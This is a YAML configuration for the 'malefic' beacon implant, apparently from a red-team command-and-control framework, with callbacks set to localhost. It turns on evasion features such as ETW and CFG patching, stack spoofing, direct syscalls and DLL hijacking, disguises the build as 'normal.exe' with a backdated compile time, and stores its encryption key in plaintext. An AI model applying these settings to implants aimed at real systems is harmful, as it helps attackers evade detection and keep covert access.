basic:
  name: "malefic"
  proxy:
    use_env_proxy: false
    url: ""
  # 7-field cron expression; quoted because a plain value starting with '*'
  # would be read by YAML as an alias
  cron: "*/5 * * * * * *"
  jitter: 0.2
  keepalive: false
  retry: 10  # consecutive failures allowed per target
  max_cycles: -1  # maximum number of cycles; -1 means loop forever
  encryption: aes
  key: "maliceofinternal"  # 16-character shared symmetric key, stored in plaintext in this file
  secure:
    enable: false
    private_key: ""  # implant private key
    public_key: ""  # server public key
  # DGA settings
  dga:
    enable: false
    key: "malefic_dga_2024"  # key
    interval_hours: 8  # generate once every 8 hours
  # Guardrail settings - environment-check protection
  guardrail:
    enable: false
    require_all: true  # presumably every populated list below must match; confirm against the consumer
    ip_addresses: []
    usernames: []
    server_names: []
    domains: []
  targets:
    # tcp
    - address: "127.0.0.1:5001"
build:
  obfstr: true
  zigbuild: false
  toolchain: "nightly-2024-02-03"
  ollvm:
    enable: false
    bcfobf: false  # Bogus Control Flow Obfuscation
    splitobf: false  # Split Control Flow Obfuscation
    subobf: false  # Instruction Substitution Obfuscation
    fco: false  # Function CallSite Obfuscation
    constenc: false  # Constant Encryption Obfuscation
  # version-resource style metadata written into the built binary
  metadata:
    icon: ""
    compile_time: "24 Jun 2015 18:03:01"  # quoted so the date is kept as text, not re-typed by the parser
    file_version: ""
    product_version: ""
    company_name: ""
    product_name: ""
    original_filename: "normal.exe"
    file_description: "normal"
    internal_name: ""
    require_admin: false  # whether to require admin privilege
    require_uac: false  # whether to require uac privilege
pulse:
  flags:
    start: 0x41  # hex literal, parsed as integer 65
    end: 0x42  # hex literal, parsed as integer 66
    magic: "beautiful"
    artifact_id: 0
  encryption: xor
  key: "maliceofinternal"  # same 16-character key as basic.key, plaintext in this file
  target: "127.0.0.1:80"  # quoted so the host:port pair is always read as a string
  protocol: "http"
  http:
    method: "POST"
    path: "/pulse"
    host: "127.0.0.1"
    version: "1.1"  # quoted: an unquoted 1.1 would be parsed as a float
    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
implants:
  runtime: tokio  # async runtime: smol/tokio/async-std
  mod: beacon  # malefic mod: beacon/bind
  register_info: true  # whether to collect sysinfo when registering
  hot_load: true  # enable hot load module
  modules:
    # modules built into malefic at compile time
    - "full"
  enable_3rd: false  # enable 3rd-party modules
  3rd_modules:
    # 3rd-party modules built into malefic at compile time
    - "full"
  prelude: ""  # prelude config filename
  pack: []  # pack
  # - src: "1.docx"
  #   dst: "1.docs"
  flags:
    start: 0x41
    end: 0x42
    magic: "beautiful"
    artifact_id: 0x1
  # for professional
  anti:
    # anti-sandbox / anti-debug / anti-disassembly / anti-forensic related
    sandbox: false
    vm: false  # enable anti vm
    # debug: true  # enable anti debug
    # disasm: true  # enable anti disasm
    # emulator: true  # enable anti emulator
    # forensic: true  # enable anti forensic
  apis:
    # apis_level: "sys_apis", "nt_apis"
    level: "nt_apis"
    # apis_priority: "normal", "user_defined_dynamic", "func_syscall", "syscalls"
    priority:
      normal:
        enable: false
        type: "normal"
      dynamic:
        enable: true
        # type: "sys_dynamic", "user_defined_dynamic"
        type: "user_defined_dynamic"
      syscalls:
        enable: false
        # type: "func_syscall", "inline_syscall"
        type: "inline_syscall"
  # key name kept as written (sic); renaming it would break whatever reads it
  alloctor:
    # inprocess: "VirtualAlloc", "VirtualAllocEx",
    #   "VirtualAllocExNuma", "HeapAlloc",
    #   "NtMapViewOfSection", "NtAllocateVirtualMemory"
    inprocess: "NtAllocateVirtualMemory"
    # crossprocess (allocter_ex): "VirtualAllocEx", "NtAllocateVirtualMemory",
    #   "VirtualAllocExNuma", "NtMapViewOfSection"
    crossprocess: "NtAllocateVirtualMemory"
  # NOTE(review): the nesting from here down is reconstructed - the source had
  # its indentation stripped. thread_stack_spoofer is placed beside alloctor and
  # the trailing loader options beside evader; confirm against the consumer's schema.
  thread_stack_spoofer: true
  loader:
    evader:
      anti_emu: true
      etw_pass: true
      god_speed: true
      sleep_encrypt: false
      anti_forensic: false
      cfg_patch: true
      api_untangle: false
      normal_api: false
    proxydll:
      proxyfunc: ""
      raw_dll: ""
      proxied_dll: ""
      proxy_dll: ""
    pack_resources: true
    block: false
    hijack_dllmain: true